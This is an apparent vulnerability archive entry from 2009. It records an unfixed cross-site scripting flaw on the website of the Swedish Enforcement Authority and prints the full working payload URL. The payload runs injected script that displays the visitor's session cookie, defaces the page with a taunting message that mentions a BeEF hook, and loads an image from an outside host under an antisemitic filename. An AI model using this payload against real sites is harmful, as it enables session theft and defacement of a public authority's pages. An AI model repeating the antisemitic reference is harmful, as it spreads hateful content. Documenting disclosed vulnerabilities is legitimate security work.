Security researcher DellNull submitted a cross-site scripting (XSS) vulnerability affecting www.kronofogden.se on 15/05/2009. At the time of submission the site ranked 159295 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Date submitted: 15/05/2009
Date published: 03/07/2009
Status: UNFIXED
Author: DellNull
Domain: www.kronofogden.se
Category: XSS
Pagerank: 159295
URL: http://www.kronofogden.se/4.383cc9f31134f01c98a80001705.html?sv.search.query.allwords=%3CSCRIPT%3E%3 C%2FSCRIPT%3E%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+Swedish+Enforcement+Authority!\n%27%2Bdo cument.cookie)%3B%3C%2FSCRIPT%3E%3Ch1%3E%3Cfont+color%3D%22red%22+size%3D%22%2B5%22%3EThe+Swedish+En forcement+Authority!+%3Cbr%3E+You+give+people+records+of+non-payment+and+now+I+give+you+a+record+of+ poor+security%2C+see+%3Ca+href+%3D%27http%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dkronofogden.se%27%3Ehtt p%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dkronofogden.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+autho rity+that+handles+sensitive+record+about+swedish+citizens+is+prone+to+security+flaws+in+their+system s!+What+if+someone+places+a+xss+proxy+hook+(like+BeEF)+here%3F+The+privacy+for+swedish+citizens+is+s upposed+to+be+protected+by+constitutional+laws.+So+live+by+the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E -+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D%27http%3A%2F%2Fwww.jrbooksonline.com%2Fjew-bwa-ha-ha .gif%27%3E&submit=S%C3%B6k |